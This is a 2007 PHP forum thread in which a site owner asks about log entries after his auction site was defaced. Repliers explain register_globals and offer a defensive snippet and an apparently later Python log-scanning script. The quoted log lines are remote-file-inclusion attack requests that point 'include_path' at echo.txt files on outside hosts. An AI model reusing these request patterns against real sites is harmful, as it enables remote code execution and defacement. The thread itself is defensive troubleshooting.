
Effect of "include_path" on URL of PHP script

Hello Everyone;

My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found lots and lots
of entries where an "include_path" parameter was included in the URL of the
PHP page, as shown below:

69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
/auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"

69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 75 "-" "libwww-perl/5.65"

69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.0" 200 75 "-" "Mozilla/5.0"

213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
404 310 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
404 310 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
/auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 325 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 333 "-" "libwww-perl/5.808"

I know how "include_path" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL is. A number of entries show a code
404 as the culprits are obviously phishing for pages, but requests with
return code 200 are showing a large number of bytes transferred -- far
larger than the PHP page itself.

Can someone explain what adding "include_path" to a URL does?

Is there something I need to check on my server or how I've got Apache
configured?

TIA.

Charles...
Oct 15 '07 #1
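
The triage the post above describes (finding requests that carry `include_path=http://...` and separating the 404 probes from the ones answered with 200) can be scripted. The following is an added example, not part of the original thread; the function names and the sample log lines (documentation IP ranges, example.net/example.org hosts) are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache common/combined log prefix: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# A parameter value that begins with a remote scheme.
REMOTE = re.compile(r'^(?:https?|ftps?)://', re.IGNORECASE)
# name=<remote URL> anywhere in the request target, even after a second "?".
LOOSE_PAIR = re.compile(r'[?&]([^=&?]+)=((?:https?|ftps?)://[^&\s]*)', re.IGNORECASE)


def top_level_params(target):
    """Split the query string the way PHP splits it: cut at the first '?',
    split on '&', then split each pair on its first '='."""
    _, _, query = target.partition('?')
    params = {}
    for pair in query.split('&'):
        if pair:
            name, _, value = pair.partition('=')
            params[unquote(name)] = unquote(value)
    return params


def scan_line(line):
    """Return one hit per parameter in this log line whose value is a remote URL."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = m['target']
    top = top_level_params(target)
    hits = []
    for name, value in LOOSE_PAIR.findall(unquote(target)):
        hits.append({
            'ip': m['ip'],
            'time': m['time'],
            'path': target.partition('?')[0],
            'param': name,
            'remote': value,
            'status': int(m['status']),
            # Response size, to compare against the page's normal size.
            'size': 0 if m['size'] == '-' else int(m['size']),
            # True only if PHP itself would see this name as a request parameter;
            # False when it is buried inside another parameter's value.
            'top_level': bool(REMOTE.match(top.get(name, ''))),
        })
    return hits


def triage(lines):
    """Collect all hits. Requests answered with 200 that carry a real top-level
    parameter sort first: they reached a script that exists. A 200 alone does
    not prove the remote file was included."""
    hits = [h for line in lines for h in scan_line(line)]
    hits.sort(key=lambda h: (not (h['status'] == 200 and h['top_level']), h['ip']))
    return hits


# Constructed sample lines in the shape of the entries quoted in the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Oct/2007:15:07:23 -0400] "GET /auction/item.php?id=268/includes/settings.inc.php?include_path=http://files.example.net/echo.txt? HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"',
    '192.0.2.10 - - [11/Oct/2007:15:07:38 -0400] "GET /auction/includes/settings.inc.php?include_path=http://files.example.net/echo.txt? HTTP/1.1" 200 75 "-" "libwww-perl/5.65"',
    '198.51.100.7 - - [11/Oct/2007:15:45:42 -0400] "GET /index.php?include_path=http%3A%2F%2Ffiles.example.org%2Fecho.txt HTTP/1.1" 404 310 "-" "libwww-perl/5.808"',
    '203.0.113.5 - - [11/Oct/2007:15:50:00 -0400] "GET /auction/item.php?id=268 HTTP/1.1" 200 56100 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for h in triage(SAMPLE_LOG):
        flag = 'REVIEW FIRST' if h['status'] == 200 and h['top_level'] else 'probe'
        print(f"{flag:12} {h['ip']:14} {h['status']} {h['size']:>6} "
              f"{h['path']} {h['param']}={h['remote']}")
```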
The include_path itself in the url is just a variable. It's what you do
with it that's important. For instance, if you have register_globals
enabled, the include_path in the URL may override the system include_path.

Or, depending on what else you do in your code. This is a big reason
why it's good to use $_POST instead of $_REQUEST if you're posting a
form to a page - $_POST will ignore any $_GET parameters.

And just another reason to *ALWAYS* validate data coming from the user.

--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
js*******@attglobal.net
==================

Oct 15 '07 #2
Hi Jerry;

Thanks!!!

I am using an auction software package that *requires* register_globals to be
enabled. I took a look at my PHP.INI file and saw where I had changed this
setting years ago (had put some comments as to what, why, and when the
change was made in the file).

I have turned register_globals off (of course the auction software no longer
works) until I figure out what to do.

Thanks again for your help!

Charles...

Oct 16 '07 #3
Charles Crume wrote:
>Hi Jerry;
>
>Thanks!!!
>
>I am using an auction software package that *requires* register_globals to be
>enabled. I took a look at my PHP.INI file and saw where I had changed this
>setting years ago (had put some comments as to what, why, and when the
>change was made in the file).
>
>I have turned register_globals off (of course the auction software no longer
>works) until I figure out what to do.
>
>Thanks again for your help!

If your software is so old that it requires register_globals, it
probably has other security holes, also.

If they don't have an upgraded version, I'd suggest you find another
package. Otherwise, chances are you'll have this happen again.
Especially since they now know you're vulnerable.

--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
js*******@attglobal.net
==================

Oct 16 '07 #4
Charles Crume wrote:
>Hi Jerry;
>
>Thanks!!!
>
>I am using an auction software package that *requires* register_globals to be
>enabled. I took a look at my PHP.INI file and saw where I had changed this
>setting years ago (had put some comments as to what, why, and when the
>change was made in the file).
>
>I have turned register_globals off (of course the auction software no longer
>works) until I figure out what to do.
>
>Thanks again for your help!
>
>Charles...

And I forgot - please don't top post. Thanks.

--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
js*******@attglobal.net
==================

Oct 16 '07 #5
Hi,

I've been the target also of a hacker, with the same attack.

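Add this to your script:

=====

// Only act when this include file is requested directly by URL
$php_self = $_SERVER['PHP_SELF'];

if (($php_self == "/auction/includes/settings.inc.php") &&
    (ini_get('register_globals'))) {
    $rg = array_keys($_REQUEST);
    foreach ($rg as $var)
    {
        // A global that mirrors a request parameter was set by register_globals
        if (isset($$var) && $_REQUEST[$var] === $$var)
        {
            unset($$var);
            exit;
        }
    }
}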

=======

This will check if they are running the file, if register_globals is
enabled catch the parameters and unset them then halt the script.

So far it is working.

Jean

Oct 16 '07 #6
.oO(Charles Crume)

>I am using an auction software package that *requires* register_globals to be
>enabled.

You shouldn't use it anymore and look for a better script, that doesn't
rely on insecure and deprecated features. register_globals is history
and will be completely dropped with PHP 6.

Micha
Oct 16 '07 #7
Hi Jean;

This has to be added to every script, correct? (If so, it would be too much
work and I would be better off to purchase newer auction software.)

I am also looking at using mod_rewrite in Apache to redirect any request with
"include_path" in it to a null page. Does anyone have thoughts on this
approach?

TIA.

Charles...

Oct 17 '07 #8
I know... however this is easier said than done. Lots of work to re-enter
customer info, sales info, items, etc.

Hopefully I will find another solution.

Thanks.

Charles...

Oct 17 '07 #9
"Gary L. Burnore" <gb******@databasix.com> wrote in message
news:ff**********@blackhelicopter.databasix.com...
>On Wed, 17 Oct 2007 19:23:17 -0400, "Charles Crume"
><NO*******@charlescrumesoftware.com> wrote:
>>I know... however this is easier said than done. Lots of work to re-enter
>>customer info, sales info, items, etc.
>>
>>Hopefully I will find another solution.
>>
>>Thanks.
>>
>>Charles...
>
>What's with the recent rash of top posters?

Google noticed the activity in this group doubled - although, it's mostly
spam.
Oct 18 '07 #10
